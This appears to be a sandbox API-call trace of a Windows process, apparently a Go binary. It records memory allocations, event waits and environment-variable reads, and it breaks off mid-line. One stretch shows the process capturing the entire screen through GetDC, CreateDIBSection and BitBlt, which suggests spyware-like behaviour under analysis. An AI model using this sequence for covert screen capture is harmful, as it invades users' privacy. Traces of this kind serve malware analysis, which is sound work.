[0281.239] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0281.546] VirtualAlloc (lpAddress=0xc0000a6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a6000 [0281.560] VirtualAlloc (lpAddress=0xc0000a8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a8000 [0281.561] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0xb80000 [0282.351] SetEvent (hEvent=0xd4) returned 1 [0282.351] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0283.559] VirtualAlloc (lpAddress=0xc0000ac000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ac000 [0284.001] SetEvent (hEvent=0xd4) returned 1 [0284.001] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0284.286] VirtualAlloc (lpAddress=0xc0000ae000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ae000 [0284.346] VirtualAlloc (lpAddress=0xc0000b0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b0000 [0284.578] SetEvent (hEvent=0xd4) returned 1 [0284.579] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0285.000] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7ffd4e1c0000 [0285.155] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetStdHandle") returned 0x7ffd4e1e3e80 [0285.156] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0285.156] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="SetHandleInformation") returned 0x7ffd4e1ed680 [0285.156] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0285.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0285.156] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0285.156] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0285.156] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0285.169] VirtualAlloc (lpAddress=0xc0000b2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b2000 [0285.298] SetEvent (hEvent=0xd4) returned 1 [0285.298] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0285.906] SetEvent (hEvent=0xd4) returned 1 [0285.906] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0286.525] VirtualAlloc (lpAddress=0xc0000b4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b4000 [0286.827] SetEvent (hEvent=0xd4) returned 1 [0286.828] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0287.664] VirtualAlloc (lpAddress=0xc0000b6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b6000 [0287.814] SetEvent (hEvent=0xd4) returned 1 [0287.814] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0288.099] VirtualAlloc (lpAddress=0xc0000b8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b8000 [0288.768] SetEvent (hEvent=0xd4) returned 1 [0288.768] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0289.218] VirtualAlloc (lpAddress=0xc0000ba000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ba000 [0289.219] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="GetEnvironmentVariableW") returned 0x7ffd4e1e35f0 [0289.231] GetEnvironmentVariableW (in: lpName="GODEBUG", lpBuffer=0xc0000ba000, nSize=0x64 | out: lpBuffer="") returned 0x0 [0289.516] SetEvent (hEvent=0xd4) returned 1 [0289.517] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0290.284] SetEvent (hEvent=0xd4) returned 1 [0290.284] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0290.540] VirtualAlloc (lpAddress=0xc0000bc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000bc000 [0290.554] VirtualAlloc (lpAddress=0xc0000be000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000be000 [0291.262] SetEvent (hEvent=0xd4) returned 1 [0291.262] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0291.548] VirtualAlloc (lpAddress=0xc0000c0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c0000 [0291.855] VirtualAlloc (lpAddress=0xc0000c2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c2000 [0291.856] VirtualAlloc (lpAddress=0xc0000c4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c4000 [0291.858] VirtualAlloc (lpAddress=0xc0000c6000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c6000 [0291.858] VirtualAlloc (lpAddress=0xc0000ca000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ca000 [0291.859] VirtualAlloc (lpAddress=0xc0000cc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000cc000 [0292.173] SetEvent (hEvent=0xd4) returned 1 [0292.173] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0292.489] VirtualAlloc (lpAddress=0xc0000ce000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ce000 [0292.510] VirtualAlloc (lpAddress=0xc0000d4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d4000 [0292.876] SetEvent (hEvent=0xd4) returned 1 [0292.876] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0293.704] VirtualAlloc (lpAddress=0xc0000d6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d6000 [0293.706] GetEnvironmentVariableW (in: lpName="DEBUG_HTTP2_GOROUTINES", lpBuffer=0xc0000ba0d0, nSize=0x64 | out: lpBuffer="") returned 0x0 [0293.994] GetEnvironmentVariableW (in: lpName="GODEBUG", lpBuffer=0xc0000ba1a0, nSize=0x64 | out: lpBuffer="") returned 0x0 [0294.613] SetEvent (hEvent=0xd4) returned 1 [0294.632] LoadLibraryW (lpLibFileName="user32.dll") returned 0x7ffd4e9d0000 [0294.635] GetProcAddress (hModule=0x7ffd4e9d0000, lpProcName="GetDC") returned 0x7ffd4ea01fe0 [0294.635] GetDC (hWnd=0x0) returned 0xa0100d0 [0294.635] LoadLibraryW (lpLibFileName="gdi32.dll") returned 0x7ffd4d8d0000 [0294.635] GetProcAddress (hModule=0x7ffd4d8d0000, lpProcName="GetDeviceCaps") returned 0x7ffd4d8f2be0 [0294.636] GetDeviceCaps (hdc=0xa0100d0, index=8) returned 1440 [0294.636] GetDeviceCaps (hdc=0xa0100d0, index=10) returned 900 [0294.738] GetProcAddress (hModule=0x7ffd4e9d0000, lpProcName="ReleaseDC") returned 0x7ffd4e9d9c50 [0294.760] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0294.760] GetDC (hWnd=0x0) returned 0xa0100d0 [0294.761] GetProcAddress (hModule=0x7ffd4d8d0000, lpProcName="CreateCompatibleDC") returned 0x7ffd4d911400 [0294.761] CreateCompatibleDC (hdc=0xa0100d0) returned 0x5c010943 [0294.761] GetProcAddress (hModule=0x7ffd4d8d0000, lpProcName="CreateDIBSection") returned 0x7ffd4d8ed040 [0294.762] CreateDIBSection (in: hdc=0x5c010943, lpbmi=0xc0000b3950, usage=0x0, ppvBits=0xc000058058, hSection=0x0, offset=0x0 | out: ppvBits=0xc000058058) returned 0x38050720 [0294.762] GetProcAddress (hModule=0x7ffd4d8d0000, lpProcName="SelectObject") returned 0x7ffd4d8eff40 [0294.763] SelectObject (hdc=0x5c010943, h=0x38050720) returned 0x185000f [0294.894] GetProcAddress (hModule=0x7ffd4d8d0000, lpProcName="BitBlt") returned 0x7ffd4d911710 [0294.894] BitBlt (hdc=0x5c010943, x=0, y=0, cx=1440, cy=900, hdcSrc=0xa0100d0, x1=0, y1=0, rop=0xcc0020) returned 1 [0300.436] SetEvent (hEvent=0x10c) returned 1 [0301.952] VirtualAlloc (lpAddress=0xc000400000, dwSize=0x800000, flAllocationType=0x2000, flProtect=0x4) returned 0xc000400000 [0301.954] VirtualAlloc (lpAddress=0x0, dwSize=0x21080, flAllocationType=0x3000, flProtect=0x4) returned 0xbc0000 [0301.954] VirtualAlloc (lpAddress=0x0, dwSize=0x21080, flAllocationType=0x3000, flProtect=0x4) returned 0xbf0000 [0301.993] VirtualAlloc (lpAddress=0xc0000da000, dwSize=0x4f2000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0301.993] VirtualAlloc (lpAddress=0xc0000da000, dwSize=0x4f2000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0301.993] VirtualAlloc (lpAddress=0xc0000da000, dwSize=0x279000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000da000 [0302.118] VirtualAlloc (lpAddress=0xc000353000, dwSize=0x279000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.118] VirtualAlloc (lpAddress=0xc000353000, dwSize=0x13c000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.118] VirtualAlloc (lpAddress=0xc000353000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000353000 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0x1db000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0xed000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0x76000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0x3b000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0x1d000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.121] VirtualAlloc (lpAddress=0xc0003f1000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0003f1000 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x1cd000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0xe6000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x73000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x39000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0302.122] VirtualAlloc (lpAddress=0xc0003ff000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0003ff000 [0302.122] VirtualAlloc (lpAddress=0xc000400000, dwSize=0x1cc000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000400000 [0302.790] SetEvent (hEvent=0xd4) returned 1 [0302.803] SetEvent (hEvent=0xe0) returned 1 [0302.803] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0303.044] VirtualAlloc (lpAddress=0xc0005cc000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005cc000 [0303.060] VirtualAlloc (lpAddress=0xc0005d4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005d4000 [0303.062] SetEvent (hEvent=0xec) returned 1 [0303.063] SetEvent (hEvent=0xe0) returned 1 [0303.063] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0303.080] SetEvent (hEvent=0xd4) returned 1 [0303.080] SetEvent (hEvent=0xe0) returned 1 [0303.080] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0303.139] SetEvent (hEvent=0x10c) returned 1 [0303.139] SetEvent (hEvent=0xec) returned 1 [0304.322] VirtualAlloc (lpAddress=0xc0005de000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005de000 [0304.323] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0304.324] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0xd50000 [0304.554] SetEvent (hEvent=0xec) returned 1 [0304.554] SetEvent (hEvent=0xe0) returned 1 [0305.433] SetEvent (hEvent=0xec) returned 1 [0305.927] SetEvent (hEvent=0xec) returned 1 [0306.203] VirtualAlloc (lpAddress=0xc0005e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005e0000 [0306.416] SetEvent (hEvent=0xec) returned 1 [0306.416] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) returned 0x0 [0307.029] SetEvent (hEvent=0xec) returned 1 [0307.029] SetEvent (hEvent=0xe0) returned 1 [0307.042] VirtualAlloc (lpAddress=0xc0005e2000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005e2000 [0307.249] VirtualAlloc (lpAddress=0xc0005e8000, dwSize=0xa2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005e8000 [0307.403] VirtualAlloc (lpAddress=0xc00068a000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00068a000 [0307.516] VirtualAlloc (lpAddress=0xc00069a000, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00069a000 [0308.622] VirtualAlloc (lpAddress=0xc0006ac000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0006ac000 [0308.957] VirtualAlloc (lpAddress=0xc0006b6000, dwSize=0x1a000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0006b6000 [0310.206] VirtualAlloc (lpAddress=0xc0006d0000, dwSize=0x3a000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0006d0000 [0313.398] VirtualAlloc (lpAddress=0xc00070a000, dwSize=0x7a000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00070a000 [0317.130] VirtualAlloc (lpAddress=0xc000784000, dwSize=0xfa000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000784000 Thread: id = 153 os_tid = 0x468 Thread: id = 161 os_tid = 0x45c [0267.489] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x306fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x306fea0*=0xc4) returned 1 [0267.489] VirtualQuery (in: lpAddress=0x306fec0, lpBuffer=0x306fec0, dwLength=0x30 | out: lpBuffer=0x306fec0*(BaseAddress=0x306f000, AllocationBase=0x2e70000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff9a85)) returned 0x30 [0267.608] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0267.808] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0267.966] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0268.166] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0268.486] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0268.820] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0269.309] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0269.630] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0269.788] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0270.245] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0270.608] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0270.778] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0270.973] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0271.142] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0271.379] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0271.490] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0271.654] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0272.002] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0272.164] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0272.293] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0272.495] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0273.216] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0273.409] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0273.463] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0273.545] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0274.038] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0274.537] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0274.567] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0274.691] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0275.181] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0275.406] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0275.546] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0275.563] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0276.024] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0276.443] SetEvent (hEvent=0xec) returned 1 [0276.443] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0276.681] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0276.812] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0276.885] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0277.389] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0277.722] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0277.754] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0277.859] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0278.034] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0278.593] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0278.716] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0278.788] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0279.175] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0279.427] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0279.558] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0279.735] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0280.027] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0280.208] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0280.352] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0280.619] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0280.968] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0281.212] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0281.239] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0281.348] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0281.648] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0281.868] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0282.352] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0283.362] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0283.415] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0283.691] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0283.843] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.001] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.013] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.166] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.472] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.579] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.704] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0284.919] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.182] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.298] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.435] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.747] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.903] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0285.926] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0286.031] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0286.370] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0286.551] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0286.828] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0287.171] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0287.381] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0287.676] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0287.814] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0287.931] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0288.112] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0288.512] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0288.769] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0289.033] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0289.218] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0289.383] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0289.517] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0289.792] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0290.082] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0290.270] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0290.404] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0290.918] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0291.110] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0291.268] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0291.399] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0291.689] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0291.860] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0292.174] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0292.358] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0292.656] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0292.872] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0293.053] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0293.985] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0294.293] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0294.778] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0295.214] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0298.393] timeEndPeriod (uPeriod=0x1) returned 0x0 [0298.393] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x10c [0298.393] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x110 [0298.402] WaitForMultipleObjects (nCount=0x2, lpHandles=0x306fde8*=0x10c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0300.584] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0300.687] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0300.918] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0301.255] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0301.601] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0301.775] NtWaitForSingleObject (Object=0xffffffffffffffff, 